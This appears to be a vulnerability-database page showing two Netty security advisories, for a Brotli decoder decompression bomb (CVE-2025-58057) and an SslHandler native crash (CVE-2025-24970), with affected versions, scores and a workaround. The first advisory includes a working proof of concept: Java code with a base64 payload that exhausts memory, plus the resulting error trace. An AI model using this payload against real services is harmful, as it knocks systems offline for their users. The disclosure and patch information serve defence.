        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Error:

Exception in thread "main" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)
    at java.base/java.nio.Bits.reserveMemory(Bits.java:178)
    at java.base/java.nio.DirectByteBuffer.<init>(DirectByteBuffer.java:121)
    at java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)
    at io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)
    at io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)
    at io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)
    at io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)
    at io.netty.buffer.PoolArena.allocate(PoolArena.java:137)
    at io.netty.buffer.PoolArena.allocate(PoolArena.java:127)
    at io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)
    at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)
    at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)
    at io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)
    at io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)
    at io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)
    at io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)
    at io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)
    at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)
    at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)
    at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
    at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
    at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
    at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)
    at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)
    at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
    at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)
    at io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)
    at io.netty.handler.codec.compression.T.main(T.java:11)

Impact

DoS for anyone using BrotliDecoder on untrusted input.

Severity ?

6.9 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-compression"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0.Alpha1"
            },
            {
              "fixed": "4.2.5.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.125.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58057"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-409"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-03T18:00:55Z",
    "nvd_published_at": "2025-09-04T10:42:32Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nWith specially crafted input, `BrotliDecoder` and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.\n\n### Details\n\n`BrotliDecoder.decompress` has no limit in how often it calls `pull`, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.\n\nTested on 4.1.118, but there were no changes to the decoder since.\n\n### PoC\n\nRun this test case with `-Xmx1G`:\n\n```java\nimport io.netty.buffer.Unpooled;\nimport io.netty.channel.embedded.EmbeddedChannel;\n\nimport java.util.Base64;\n\npublic class T {\n    public static void main(String[] args) {\n        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());\n        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode(\"aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=\")));\n    }\n}\n```\n\nError:\n\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)\n\tat java.base/java.nio.Bits.reserveMemory(Bits.java:178)\n\tat java.base/java.nio.DirectByteBuffer.\u003cinit\u003e(DirectByteBuffer.java:121)\n\tat java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)\n\tat io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)\n\tat io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)\n\tat io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)\n\tat io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:137)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:127)\n\tat io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)\n\tat io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)\n\tat io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)\n\tat io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)\n\tat io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)\n\tat io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)\n\tat io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)\n\tat io.netty.handler.codec.compression.T.main(T.java:11)\n```\n\n### Impact\n\nDoS for anyone using `BrotliDecoder` on untrusted input.",
  "id": "GHSA-3p8m-j85q-pgmj",
  "modified": "2025-09-04T13:51:43Z",
  "published": "2025-09-03T18:00:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-3p8m-j85q-pgmj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58057"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/9d804c54ce962408ae6418255a83a13924f7145d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netty/netty"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Netty\u0027s decoders vulnerable to DoS via zip bomb style attack"
}

GHSA-4G8C-WM8X-JFHW

Vulnerability from github – Published: 2025-02-10 17:38 – Updated: 2025-04-16 19:30

Summary

SslHandler doesn't correctly validate packets which can lead to native crash when using native SSLEngine

Details

Impact

When a special crafted packet is received via SslHandler it doesn't correctly handle validation of such a packet in all cases which can lead to a native crash.

Workarounds

As workaround its possible to either disable the usage of the native SSLEngine or changing the code from:

SslContext context = ...;
SslHandler handler = context.newHandler(....);

to:

SslContext context = ...;
SSLEngine engine = context.newEngine(....);
SslHandler handler = new SslHandler(engine, ....);

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.117.Final"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-handler"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.91.Final"
            },
            {
              "fixed": "4.1.118.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24970"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-10T17:38:10Z",
    "nvd_published_at": "2025-02-10T22:15:38Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nWhen a special crafted packet is received via SslHandler it doesn\u0027t correctly handle validation of such a packet in all cases which can lead to a native crash.\n\n### Workarounds\nAs workaround its possible to either disable the usage of the native SSLEngine or changing the code from:\n\n```\nSslContext context = ...;\nSslHandler handler = context.newHandler(....);\n```\n\nto:\n\n```\nSslContext context = ...;\nSSLEngine engine = context.newEngine(....);\nSslHandler handler = new SslHandler(engine, ....);\n```",
  "id": "GHSA-4g8c-wm8x-jfhw",
  "modified": "2025-04-16T19:30:03Z",
  "published": "2025-02-10T17:38:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-4g8c-wm8x-jfhw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24970"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/87f40725155b2f89adfde68c7732f97c153676c4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netty/netty"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20250221-0005"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-detection"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-mitigation"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SslHandler doesn\u0027t correctly validate packets which can lead to native crash when using native SSLEngine"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

Vulnerability from cleanstart

CVE-2025-52999 (GCVE-0-2025-52999)

CVE-2025-58057 (GCVE-0-2025-58057)

CVE-2026-1225 (GCVE-0-2026-1225)

CVE-2026-23901 (GCVE-0-2026-23901)

CVE-2026-44431 (GCVE-0-2026-44431)

CVE-2026-44432 (GCVE-0-2026-44432)

GHSA-25QH-J22F-PWP8

GHSA-389X-839F-4RHX

Summary

Details

PoC

Impact

GHSA-3P8M-J85Q-PGMJ

Summary

Details

PoC

Impact

GHSA-4G8C-WM8X-JFHW

Impact

Workarounds

Tags

Sightings

Nomenclature